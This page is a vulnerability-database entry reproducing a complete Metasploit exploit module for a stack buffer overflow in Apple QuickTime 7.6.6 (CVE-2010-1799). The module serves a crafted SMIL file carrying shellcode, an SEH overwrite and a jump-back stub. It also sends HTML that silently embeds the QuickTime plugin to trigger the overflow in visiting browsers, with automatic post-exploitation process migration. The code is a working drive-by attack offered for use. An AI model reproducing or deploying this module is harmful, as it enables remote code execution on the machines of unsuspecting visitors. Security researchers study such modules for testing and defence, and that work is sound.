Lucene search
+L

Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow

🗓️ 13 Aug 2010 23:11:23Reported by Krystian Kloskowski, jduck <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 67 Views

Apple QuickTime 7.6.6 SMIL URI Buffer Overflo

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking # needs more testing/targets to be Great

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Seh

  #include Msf::Exploit::Remote::BrowserAutopwn
  #autopwn_info({
  #  :os_name => OperatingSystems::Match::WINDOWS,
  #  :javascript => true,
  #  :rank       => NormalRanking, # reliable memory corruption
  #  :vuln_test  => nil,
  #})

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in Apple QuickTime
        7.6.6. When processing a malformed SMIL uri, a stack-based buffer
        overflow can occur when logging an error message.
      },
      'Author'         =>
        [
          'Krystian Kloskowski',  # original discovery
          'jduck'                 # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2010-1799' ],
          [ 'OSVDB', '66636'],
          [ 'BID', '41962' ],
          [ 'URL', 'http://web.archive.org/web/20100729143247/http://secunia.com:80/advisories/40729' ],
          [ 'URL', 'http://support.apple.com/kb/HT4290' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
      'Payload'        =>
        {
          'Space'    => 640, # 716 - 63 - 8 - 5
          'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40\x5c",
        },
      'Platform' => 'win',
      'Targets'  =>
        [
          #[ 'Automatic', { } ],
          [ 'Apple QuickTime Player 7.6.6',
            {
              'Ret' => 0x66801042 # p/p/r from QuickTime.qts (v7.66.71.0)
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2010-08-12',
      'DefaultTarget'  => 0))
  end

  def on_request_uri(client, request)

    return if ((p = regenerate_payload(client)) == nil)

    if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.smil$/)
      print_status("Sending exploit SMIL (target: #{target.name})")

      # This is all basically filler on the browser target because we can't
      # expect the SEH to be in a reliable place across multiple browsers.
      # Heap spray ftw.

      off = 716
      start = "cHTTPDhlr_SetURL - url doesn't start with http:// or http1:// '"

      scheme = rand_text_alphanumeric(5)

      sploit = ''
      sploit << scheme
      sploit << "://"

      # payload
      sploit << p.encoded

      # pad to SEH
      sploit << rand_text_english(off - sploit.length - start.length)

      # seh frame
      sploit << generate_seh_record(target.ret)

      # jmp back to payload
      distance = off + 8 - (8 + start.length)
      sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

      # force exception while writing
      sploit << rand_text(1024) * 15

      smil = %Q|<smil xmlns="http://www.w3.org/2001/SMIL20/Language">
<body>
<img src="#{sploit}" />
</body>
</smil>
|
      send_response(client, smil, { 'Content-Type' => "application/smil" })

    else
      print_status("Sending initial HTML")

      shellcode = Rex::Text.to_unescape(p.encoded)
      url =  ((datastore['SSL']) ? "https://" : "http://")
      url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
      url << ":" + datastore['SRVPORT'].to_s
      url << get_resource

      fname = rand_text_alphanumeric(4)

      content =  "<html><body>"
      content << <<-ENDEMBED
          <OBJECT
          CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
          WIDTH="1"
          HEIGHT="1"
          CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
          <PARAM name="SRC"        VALUE = "#{url}/#{fname}.smil">
          <PARAM name="QTSRC"      VALUE = "#{url}/#{fname}.smil">
          <PARAM name="AUTOPLAY"   VALUE = "true"               >
          <PARAM name="TYPE"       VALUE = "video/quicktime"    >
          <PARAM name="TARGET"     VALUE = "myself"             >
          <EMBED
            SRC        = "#{url}/#{fname}.qtl"
            QTSRC      = "#{url}/#{fname}.qtl"
            TARGET     = "myself"
            WIDTH      = "1"
            HEIGHT     = "1"
            AUTOPLAY   = "true"
            PLUGIN     = "quicktimeplugin"
            TYPE       = "video/quicktime"
            CACHE      = "false"
            PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
          </EMBED>
          </OBJECT>
        ENDEMBED
      content << "</body></html>"

      send_response(client, content, { 'Content-Type' => "text/html" })
    end

    # Handle the payload
    handler(client)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Mar 2023 10:43Current
7.3High risk
Vulners AI Score7.3
CVSS 29.3
EPSS0.33701
67